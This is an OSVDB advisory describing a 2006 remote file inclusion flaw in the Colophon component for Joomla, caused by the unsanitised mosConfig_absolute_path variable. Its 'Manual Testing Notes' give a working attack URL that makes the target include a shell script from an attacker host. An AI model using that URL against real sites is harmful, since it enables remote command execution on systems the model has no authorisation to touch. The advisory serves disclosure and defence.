Colophon for Joomla admin.colophon.php mosConfig_absolute_path Variable Remote File Inclusion

2006-07-29T09:04:09
ID OSVDB:27659
Type osvdb
Reporter Drago84()
Modified 2006-07-29T09:04:09

Description

Vulnerability Description

Colophon for Joomla contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin.colophon.php script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Colophon for Joomla contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin.colophon.php script not properly sanitizing user input supplied to the 'mosConfig_absolute_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

htttp://[target]/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://[attacker]/shell.php?

References:

Vendor URL: http://www.schoolastech.com/ Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,81587.0.html Vendor Specific News/Changelog Entry: http://forum.joomla.org/index.php/topic,79477.0.html Secunia Advisory ID:21288 ISS X-Force ID: 28076 Generic Exploit URL: http://milw0rm.com/exploits/2085 FrSIRT Advisory: ADV-2006-3057 CVE-2006-3969 Bugtraq ID: 19252